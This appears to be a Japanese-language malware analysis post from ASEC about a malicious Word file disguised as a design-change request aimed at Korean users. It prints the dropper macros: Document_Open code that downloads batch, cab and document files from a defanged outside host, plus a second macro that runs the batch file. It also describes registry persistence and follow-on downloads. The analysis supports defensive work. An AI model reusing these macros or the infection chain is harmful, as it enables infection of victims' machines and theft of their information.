Posted By Hansoyoung , 2021年 December 9日

デザイン修正リクエストのドキュメントに偽装した情報窃取目的の不正な Word

ASEC 分析チームは、韓国国内ユーザーをターゲットにした不正な Word ドキュメントが拡散していることを確認した。ファイル名は デザイン修正リクエスト.doc であり、以下のようにマクロの実行を誘導する画像が含まれている。

この Word ファイル内部には以下のように hxxp://filedownloaders.com/doc09 から追加ファイルをダウンロードする不正なマクロが含まれている。ユーザーがコンテンツの有効化ボタンをクリックすると、マクロが自動で実行され、追加の不正なファイルをダウンロードする。

Sub Document_Open()
    Dim RetVal As Long
    
    RetVal = download_func(0, "hxxp://filedownloaders[.]com/doc09/no6.txt", "C:\Users\Public\Documents\no1.bat", 0, 0)
    RetVal = download_func (0, "hxxp://filedownloaders[.]com/doc09/vbs6.txt", "C:\Users\Public\Documents\setup.cab", 0, 0)
    RetVal = download_func (0, "hxxp://filedownloaders[.]com/doc09/temp0101.doc", "C:\Users\Public\Documents\temp.doc", 0, 0)
    
    Dim OpenDoc: Set OpenDoc = CreateObject("Word.Application")
    OpenDoc.Visible = True
    Dim WorkDone: Set WorkDone = OpenDoc.Documents.Open("C:\Users\Public\Documents\temp.doc")

その後、ダウンロードした temp.doc ドキュメントファイルを実行する。この Word ドキュメントは、以下のように韓国国内の企業を騙る内容を含んでいる。

temp.doc には先にダウンロードした no1.bat ファイルを実行させるマクロが含まれている。

Sub Document_Open()
   WinExec "C:\Users\Public\Documents\no1.bat", 0
End Sub

Word ファイルによって実行された no1.bat は vvire.bat を実行させる。vvire.bat が存在しない場合、hxxp://filedownloaders.com/doc09/vbs6.txt からダウンロードした setup.cab ファイルの圧縮を解凍したあと、vvire.bat を実行する。

vvire.bat はレジストリ登録および no4.bat ファイルの実行、追加ファイルのダウンロード機能を実行する。

Start.vbs ファイルをレジストリに登録して vvire.bat ファイルが自動で実行されるようにし、no4.bat の実行後に no1.bat を削除する。以降は特定のファイルが存在するかを確認し hxxp://senteroman.com/dow11/%COMPUTERNAME%.txt から追加ファイルをダウンロード、および実行する。現在、当該ファイルの場合はダウンロードが行われないため、確認が不可能である。

Start.vbs ファイルは以下の通りである。